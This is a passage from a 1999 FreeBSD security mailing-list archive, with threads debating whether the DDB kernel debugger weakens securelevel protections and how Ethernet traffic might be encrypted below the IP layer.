bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel References: <199909060513.PAA12402@godzilla.zeta.org.au> <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp> <199909061539.IAA74893@apollo.backplane.com> <19990906204930.14319.qmail@alice.gba.oz.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> Though, as a side note, it should be noted that if you have DDB :> enabled then lowering the secure level is pretty easy to do. If you :> have access to the console, of course. : :It should also be noted that it makes no sense to enable DDB on :systems that need to use elevated securelevels. : :-- :Greg Black -- I disagree quite strongly. DDB provides a mechanism to allow a sysadmin to obtain a greater amount of information from a panic situation then he could get otherwise. Being able to obtain this information does not run counter to running with a raised securelevel. If the system winds up in a state where a kernel core cannot be generated, DDB is the only way to figure out what is going on. securelevel is a mechanism which attempts to guarentee data security, at least to a degree. These two items do not clash. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 21:39:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id E9E1A1517C for ; Mon, 6 Sep 1999 21:39:48 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id VAA15125 for ; Mon, 6 Sep 1999 21:35:39 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D496A5.A0576E0F@aracnet.com> Date: Mon, 06 Sep 1999 21:37:57 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Layer 2 ethernet encryption? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My apologies if this shouldn't be posted to this group, but I didn't know of any other place where an open discussion among "friends" could take place. If I should take this elsewhere, just let me know. Is it possible to encrypt ethernet packets so that all layers above layer 2 would be encrypted? The idea I had was to make a device that could defeat a TCP sniffer by encrypting the IP headers. Is this doable? Viable? A reinvention of the wheel? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 21:50:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from valiant.cis.hcc.cc.il.us (valiant.cis.hcc.cc.il.us [4.17.214.6]) by hub.freebsd.org (Postfix) with ESMTP id 8D9C014CA3 for ; Mon, 6 Sep 1999 21:50:44 -0700 (PDT) (envelope-from bryan@valiant.cis.hcc.cc.il.us) Received: from localhost (bryan@localhost) by valiant.cis.hcc.cc.il.us (8.9.3/8.9.3) with ESMTP id XAA10645; Mon, 6 Sep 1999 23:51:10 -0500 Date: Mon, 6 Sep 1999 23:51:10 -0500 (CDT) From: "Bryan Smith (Administrator)" To: dmp@aracnet.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <37D496A5.A0576E0F@aracnet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org where would you implement this on the system? I just use SSH. Bryan Smith The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own rediness to receive him, not on the chance of his not attacking, but rather on the fact that we have made our position unassailable. -- Sun-Tzu The Art of Warfare On Mon, 6 Sep 1999 dmp@aracnet.com wrote: > My apologies if this shouldn't be posted to this group, but I didn't > know of any other place where an open discussion among "friends" > could take place. If I should take this elsewhere, just let me know. > > Is it possible to encrypt ethernet packets so that all layers above > layer 2 would be encrypted? The idea I had was to make a device that > could defeat a TCP sniffer by encrypting the IP headers. Is this > doable? Viable? A reinvention of the wheel? > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 22: 6: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from eclogite.eps.nagoya-u.ac.jp (eclogite.eps.nagoya-u.ac.jp [133.6.124.145]) by hub.freebsd.org (Postfix) with ESMTP id E31A815A55; Mon, 6 Sep 1999 22:05:39 -0700 (PDT) (envelope-from kato@ganko.eps.nagoya-u.ac.jp) Received: from localhost (gneiss.eps.nagoya-u.ac.jp [133.6.124.148]) by eclogite.eps.nagoya-u.ac.jp (8.9.3/3.7W) with ESMTP id OAA03353; Tue, 7 Sep 1999 14:00:46 +0900 (JST) To: dillon@apollo.backplane.com Cc: gjb-freebsd@gba.oz.au, des@flood.ping.uio.no, kato@ganko.eps.nagoya-u.ac.jp, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel From: KATO Takenori In-Reply-To: Your message of "Mon, 6 Sep 1999 21:20:55 -0700 (PDT)" <199909070420.VAA77483@apollo.backplane.com> References: <199909070420.VAA77483@apollo.backplane.com> X-Mailer: Mew version 1.93 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA) X-PGP-Fingerprint: 03 72 85 36 62 46 23 03 52 B1 10 22 44 10 0D 9E Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19990907140016E.kato@gneiss.eps.nagoya-u.ac.jp> Date: Tue, 07 Sep 1999 14:00:16 +0900 X-Dispatcher: imput version 980905(IM100) Lines: 37 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Dillon wrote: > I disagree quite strongly. DDB provides a mechanism to allow a > sysadmin to obtain a greater amount of information from a panic > situation then he could get otherwise. Being able to obtain this > information does not run counter to running with a raised securelevel. > > If the system winds up in a state where a kernel core cannot be > generated, DDB is the only way to figure out what is going on. > securelevel is a mechanism which attempts to guarentee data security, > at least to a degree. These two items do not clash. If console works and crackers can use it, protecting securelevel from DDB does not provide enough security. Though securelevel cannot be changed, (1) Turn off power. (2) Boot as single-user mode. (3) Do what crackers want. or (1) Turn off power. (2) Remove HDD. (3) Mount on another FreeBSD box. (4) Edit a file in the HDD. (5) Return HDD. (6) Reboot. is available. -----------------------------------------------+--------------------------+ KATO Takenori | FreeBSD | Dept. Earth Planet. Sci, Nagoya Univ. | The power to serve! | Nagoya, 464-8602, Japan | http://www.FreeBSD.org/ | ++++ FreeBSD(98) 3.2: Rev. 01 available! |http://www.jp.FreeBSD.org/| ++++ FreeBSD(98) 2.2.8: Rev. 02 available! +==========================+ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 22: 6:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id 07FD714EE9; Mon, 6 Sep 1999 22:06:47 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: by border.alcanet.com.au id <40326>; Tue, 7 Sep 1999 15:04:09 +1000 Date: Tue, 7 Sep 1999 15:06:02 +1000 From: Peter Jeremy Subject: Re: Init(8) cannot decrease securelevel In-reply-to: <199909070420.VAA77483@apollo.backplane.com> To: dillon@apollo.backplane.com Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Message-Id: <99Sep7.150409est.40326@border.alcanet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Dillon wrote: > If the system winds up in a state where a kernel core cannot be > generated, DDB is the only way to figure out what is going on. > securelevel is a mechanism which attempts to guarentee data security, > at least to a degree. The problem is that DDB currently allows too much freedom. It needs to disable various commands as the securelevel is raised. Working out which commands is the non-trivial exercise - especially since you can add new ones with DB_COMMAND(). Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 22:11:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.adsu.bellsouth.com (ns1.adsu.bellsouth.com [205.152.173.2]) by hub.freebsd.org (Postfix) with ESMTP id 436E014CF7 for ; Mon, 6 Sep 1999 22:11:19 -0700 (PDT) (envelope-from ck@ns1.adsu.bellsouth.com) Received: (from ck@localhost) by ns1.adsu.bellsouth.com (8.9.1a/8.9.1) id BAA12550; Tue, 7 Sep 1999 01:08:28 -0400 (EDT) Date: Tue, 7 Sep 1999 01:08:27 -0400 From: Christian Kuhtz To: "Bryan Smith (Administrator)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? Message-ID: <19990907010827.A124@ns1.adsu.bellsouth.com> References: <37D496A5.A0576E0F@aracnet.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Bryan Smith (Administrator) on Mon, Sep 06, 1999 at 11:51:10PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Err, there are some things that don't run easily over SSH. You could approach this at least four ways (that I can think of): a) write a device driver layer which inserts link layer encryption and crypto management functions. - you'd need to do this with each box and device driver you want to be able to communicate with each other -- very cumbersome, IMHO, and a bad idea unless you got a damn good reason to do so. b) use IPv4 IPSec -- pain in the a** after all the junk we had to deal with in my professional life. Lots and lots of interop issues. c) use IPv6 IPSec -- learning curve to properly run IPv6 may be a bit high, but the rest is pretty straightforward and IMHO more clean than IPv4 IPSec, particularly IPSec host-mode. d) use SSL style application layer encryption. -- by far the most portable implementation. It'd help if you could describe a little more of what exactly you're trying to do.. Ask yourself who you mistrust and who you trust in your application. That's usually the best way to approach encryption, unless you are a marketing moron^H^H^H^H^Hgenius. Cheers, Chris On Mon, Sep 06, 1999 at 11:51:10PM -0500, Bryan Smith (Administrator) wrote: > where would you implement this on the system? > > I just use SSH. > > Bryan Smith [.. huge sig clipped ..] -- Christian Kuhtz, Sr. Network Architect BellSouth Corporation -wk, -hm Advanced Data Services "Affiliation given for identification, not representation." Atlanta, GA, U.S. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 22:33:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from noop.colo.erols.net (noop.colo.erols.net [207.96.1.150]) by hub.freebsd.org (Postfix) with ESMTP id 0A9A514F53 for ; Mon, 6 Sep 1999 22:33:13 -0700 (PDT) (envelope-from gjp@noop.colo.erols.net) Received: from localhost ([127.0.0.1] helo=noop.colo.erols.net) by noop.colo.erols.net with esmtp (Exim 2.12 #1) id 11ODsJ-000AGn-00; Tue, 7 Sep 1999 01:32:59 -0400 To: dmp@aracnet.com Cc: freebsd-security@freebsd.org From: "Gary Palmer" Subject: Re: Layer 2 ethernet encryption? In-reply-to: Your message of "Mon, 06 Sep 1999 21:37:57 PDT." <37D496A5.A0576E0F@aracnet.com> Date: Tue, 07 Sep 1999 01:32:58 -0400 Message-ID: <39480.936682378@noop.colo.erols.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org dmp@aracnet.com wrote in message ID <37D496A5.A0576E0F@aracnet.com>: > Is it possible to encrypt ethernet packets so that all layers above > layer 2 would be encrypted? The idea I had was to make a device that > could defeat a TCP sniffer by encrypting the IP headers. Is this > doable? Viable? A reinvention of the wheel? How would you route the traffic? No routers would be able to pass the traffic. If you are doing this for a local LAN, I suggest you have bigger problems :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 22:39:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from netserv.osi.ru (netserv.osi.ru [195.178.193.139]) by hub.freebsd.org (Postfix) with ESMTP id C6A4815008 for ; Mon, 6 Sep 1999 22:39:12 -0700 (PDT) (envelope-from ks@itp.ac.ru) Received: from ntgate.osi.ru (ntgate.osi.ru [195.178.194.141]) by netserv.osi.ru (8.9.1a/8.9.1) with SMTP id JAA09478; Tue, 7 Sep 1999 09:40:02 +0400 (MSK/MSD) Received: from speecart.osi.ru ([195.178.194.35]) by ntgate.osi.ru (Lotus SMTP MTA v4.6.5 (863.2 5-20-1999)) with SMTP id C32567E5.001F1B5E; Tue, 7 Sep 1999 09:39:46 +0400 Message-ID: X-Mailer: XFMail 1.2 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <37D496A5.A0576E0F@aracnet.com> Date: Tue, 07 Sep 1999 09:41:21 +0400 (MSD) Reply-To: ks@itp.ac.ru Organization: OSI AF, Moscow office From: "Sergey S. Kosyakov" To: dmp@aracnet.com Subject: RE: Layer 2 ethernet encryption? Cc: freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 07-Sep-99 dmp@aracnet.com wrote: > Is it possible to encrypt ethernet packets so that all layers above > layer 2 would be encrypted? The idea I had was to make a device that > could defeat a TCP sniffer by encrypting the IP headers. Is this > doable? Viable? A reinvention of the wheel? > You can establish secure tunnel with TUND - over tun(4) pseudo-devices if you use routing, or over divert(4) sockets with ipfw(8) rules for LAN. --- ---------------------------------- E-Mail: Sergey S. Kosyakov Date: 07-Sep-99 Time: 09:39:12 ---------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 22:40:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id 8AC52155C1 for ; Mon, 6 Sep 1999 22:40:04 -0700 (PDT) (envelope-from dscheidt@tumbolia.com) Received: (qmail 3585 invoked from network); 7 Sep 1999 05:40:04 -0000 Received: from shell-2.enteract.com (dscheidt@207.229.143.41) by pop3-3.enteract.com with SMTP; 7 Sep 1999 05:40:04 -0000 Date: Tue, 7 Sep 1999 00:40:03 -0500 (CDT) From: David Scheidt X-Sender: dscheidt@shell-2.enteract.com To: KATO Takenori Cc: dillon@apollo.backplane.com, gjb-freebsd@gba.oz.au, des@flood.ping.uio.no, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel In-Reply-To: <19990907140016E.kato@gneiss.eps.nagoya-u.ac.jp> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 7 Sep 1999, KATO Takenori wrote: > DDB does not provide enough security. Though securelevel cannot be > changed, > > (1) Turn off power. > (2) Boot as single-user mode. Setting the console as insecure should protect against this. > or > > (1) Turn off power. > (2) Remove HDD. > (3) Mount on another FreeBSD box. > (4) Edit a file in the HDD. > (5) Return HDD. > (6) Reboot. > > is available. There isn't a whole lot you can do to protect a system against crackers who have physical access to the system. Heavily armed guards would help, but I don't expect to see them as part of the base distribution anytime soon. David Scheidt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 22:44:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 8773115008; Mon, 6 Sep 1999 22:44:52 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id WAA04637; Mon, 6 Sep 1999 22:42:32 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199909070542.WAA04637@gndrsh.dnsmgr.net> Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <39480.936682378@noop.colo.erols.net> from Gary Palmer at "Sep 7, 1999 01:32:58 am" To: gpalmer@FreeBSD.ORG (Gary Palmer) Date: Mon, 6 Sep 1999 22:42:32 -0700 (PDT) Cc: dmp@aracnet.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > dmp@aracnet.com wrote in message ID > <37D496A5.A0576E0F@aracnet.com>: > > Is it possible to encrypt ethernet packets so that all layers above > > layer 2 would be encrypted? The idea I had was to make a device that > > could defeat a TCP sniffer by encrypting the IP headers. Is this > > doable? Viable? A reinvention of the wheel? > > How would you route the traffic? No routers would be able to pass the > traffic. No, only routers knowing the key would be able to route traffic. > > If you are doing this for a local LAN, I suggest you have bigger > problems :) Maybe the LAN is ``wireless'' :-). But more seriously the Wavelan and several other wireless cards do DES encryption at layer 1... so it _can_ be done. And more importantly is being done (first hand knowledge on that one). See one ``bigger problem''? Without DES on our wireless network any old joe with a wavelan card could come along, sniff for a while, find an open IP and jump right on into our network. Though many other safe gards would make his life a fair bit harder than this, until we implemented DES at layer 1 we had a problem.... I could care less about them being able to see the data, but being able to join the network was the real problem. We are facing a similiar engineering/security problem on another project that involves wired networks, but I can't get into that one. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 22:47:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id C036915780 for ; Mon, 6 Sep 1999 22:47:39 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id WAA21494; Mon, 6 Sep 1999 22:44:53 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D4A6E0.F49A6F87@aracnet.com> Date: Mon, 06 Sep 1999 22:47:12 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Bryan Smith (Administrator)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Bryan Smith (Administrator)" wrote: > > where would you implement this on the system? A layer 2 bridge between the NIC and the network. > I just use SSH. SSH still requires that unencrypted IP headers be used, allowing a sniffer to see the traffic. > On Mon, 6 Sep 1999 dmp@aracnet.com wrote: > > > My apologies if this shouldn't be posted to this group, but I didn't > > know of any other place where an open discussion among "friends" > > could take place. If I should take this elsewhere, just let me know. > > > > Is it possible to encrypt ethernet packets so that all layers above > > layer 2 would be encrypted? The idea I had was to make a device that > > could defeat a TCP sniffer by encrypting the IP headers. Is this > > doable? Viable? A reinvention of the wheel? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 23: 6:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 2D3F9155DE; Mon, 6 Sep 1999 23:06:04 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id XAA22940; Mon, 6 Sep 1999 23:03:32 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D4AB40.AEE4C2EA@aracnet.com> Date: Mon, 06 Sep 1999 23:05:52 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Gary Palmer Cc: freebsd-security@freebsd.org Subject: Re: Layer 2 ethernet encryption? References: <39480.936682378@noop.colo.erols.net> Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Gary Palmer wrote: > > dmp@aracnet.com wrote in message ID > <37D496A5.A0576E0F@aracnet.com>: > > Is it possible to encrypt ethernet packets so that all layers above > > layer 2 would be encrypted? The idea I had was to make a device that > > could defeat a TCP sniffer by encrypting the IP headers. Is this > > doable? Viable? A reinvention of the wheel? > > How would you route the traffic? No routers would be able to pass the > traffic. The network in question doesn't use IP-based routing. > If you are doing this for a local LAN, I suggest you have bigger > problems :) You're right, I do have bigger problems. Like deep paranoia among the users of the LAN. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 23:17:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from mrelay.jrc.it (mrelay.jrc.it [139.191.1.65]) by hub.freebsd.org (Postfix) with ESMTP id B4F0515772; Mon, 6 Sep 1999 23:17:51 -0700 (PDT) (envelope-from nick.hibma@jrc.it) Received: from elect8 (elect8.jrc.it [139.191.71.152]) by mrelay.jrc.it (LMC5692) with ESMTP id IAA07918; Tue, 7 Sep 1999 08:13:34 +0200 (MET DST) Date: Tue, 7 Sep 1999 08:13:35 +0200 (MET DST) From: Nick Hibma X-Sender: n_hibma@elect8 Reply-To: Nick Hibma To: Matthew Dillon Cc: Greg Black , Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel In-Reply-To: <199909070420.VAA77483@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I disagree quite strongly. DDB provides a mechanism to allow a > sysadmin to obtain a greater amount of information from a panic > situation then he could get otherwise. Being able to obtain this > information does not run counter to running with a raised securelevel. > > If the system winds up in a state where a kernel core cannot be > generated, DDB is the only way to figure out what is going on. > securelevel is a mechanism which attempts to guarentee data security, > at least to a degree. These two items do not clash. > Anyway, as soon as you can physically access the PC, youD loose anyway, independent of whether you can go into DDB to do things. You can reboot, boot a floppy. Yes you can do something about those things, but only to a limited extent. Nick -- ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 23:21:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from bogon.kjsl.com (bogon.kjsl.com [206.55.236.201]) by hub.freebsd.org (Postfix) with ESMTP id BDB7C14D68; Mon, 6 Sep 1999 23:21:32 -0700 (PDT) (envelope-from javier@bogon.kjsl.com) Received: (from javier@localhost) by bogon.kjsl.com (8.9.3/8.9.3) id XAA06072; Mon, 6 Sep 1999 23:20:00 -0700 (PDT) From: Javier Henderson MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14292.44688.380092.659018@bogon.kjsl.com> Date: Mon, 6 Sep 1999 23:20:00 -0700 (PDT) To: dmp@aracnet.com Cc: Gary Palmer , freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <37D4AB40.AEE4C2EA@aracnet.com> References: <39480.936682378@noop.colo.erols.net> <37D4AB40.AEE4C2EA@aracnet.com> X-Mailer: VM 6.63 under Emacs 19.34.1 X-Airplane-of-the-day: Grumman Tiger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > Is it possible to encrypt ethernet packets so that all layers above > > > layer 2 would be encrypted? The idea I had was to make a device that > > > could defeat a TCP sniffer by encrypting the IP headers. Is this > > > doable? Viable? A reinvention of the wheel? DEC used to have something called DESNC. I've no idea if it exists or not still, but it does (did) what you want. -jav To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 23:23:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 39B381562A; Mon, 6 Sep 1999 23:23:28 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id XAA24284; Mon, 6 Sep 1999 23:20:16 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D4AF2C.A850CEEA@aracnet.com> Date: Mon, 06 Sep 1999 23:22:36 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Javier Henderson Cc: Gary Palmer , freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <39480.936682378@noop.colo.erols.net> <37D4AB40.AEE4C2EA@aracnet.com> <14292.44688.380092.659018@bogon.kjsl.com> Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Javier Henderson wrote: >> Is it possible to encrypt ethernet packets so that all layers above >> layer 2 would be encrypted? The idea I had was to make a device that >> could defeat a TCP sniffer by encrypting the IP headers. Is this >> doable? Viable? A reinvention of the wheel? > > DEC used to have something called DESNC. I've no idea > if it exists or not still, but it does (did) what you want. Do you have the part/model names/numbers by any chance? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 23:25: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id EB29B15008; Mon, 6 Sep 1999 23:24:55 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id E8E2B1C19; Tue, 7 Sep 1999 01:28:16 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id E41093817; Tue, 7 Sep 1999 01:28:16 -0400 (EDT) Date: Tue, 7 Sep 1999 01:28:16 -0400 (EDT) From: Bill Fumerola To: Nick Hibma Cc: Matthew Dillon , Greg Black , Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 7 Sep 1999, Nick Hibma wrote: > Anyway, as soon as you can physically access the PC, youD loose anyway, > independent of whether you can go into DDB to do things. You can reboot, > boot a floppy. Yes you can do something about those things, but only to > a limited extent. Not without someone noticing in a big way. DDB is a silent attack. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 23:29: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from jason.argos.org (a1-3a123.neo.rr.com [24.93.180.123]) by hub.freebsd.org (Postfix) with ESMTP id 2C8F115B52 for ; Mon, 6 Sep 1999 23:28:03 -0700 (PDT) (envelope-from mike@argos.org) Received: from localhost (mike@localhost) by jason.argos.org (8.9.1/8.9.1) with ESMTP id CAA03636; Tue, 7 Sep 1999 02:26:53 -0400 Date: Tue, 7 Sep 1999 02:26:51 -0400 (EDT) From: Mike Nowlin To: dmp@aracnet.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <37D4AB40.AEE4C2EA@aracnet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The network in question doesn't use IP-based routing. > > > If you are doing this for a local LAN, I suggest you have bigger > > problems :) > > You're right, I do have bigger problems. Like deep paranoia among > the users of the LAN. I'm having trouble grasping the idea behind this... Generally speaking, even if you couldn't see the IP src and dst addrs for a packet (as if they were encrypted), you could still see the ethernet addresses, and those are almost as good when it comes to local networks. Anybody with half a clue could figure out which ethernet addresses match up to which machines and their uses. As far as the paranoia, it sounds like your users know enough to be dangerous, but don't really understand the problem. Marketing people, perhaps? :) Assuming someone has physical access to something (the ethernet) that carries traffic they're not supposed to see (like the packets in question), there's little you can do to ensure that somebody can't figure out a way around your security. If that isn't enough, you start looking into managed switches, locked server rooms, and (if all else fails) a new profession. I'm not against the idea, (actually, it sounds kinda neat), but there's a lot of problems.. mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 23:41:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 073FA14C57; Mon, 6 Sep 1999 23:41:26 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by 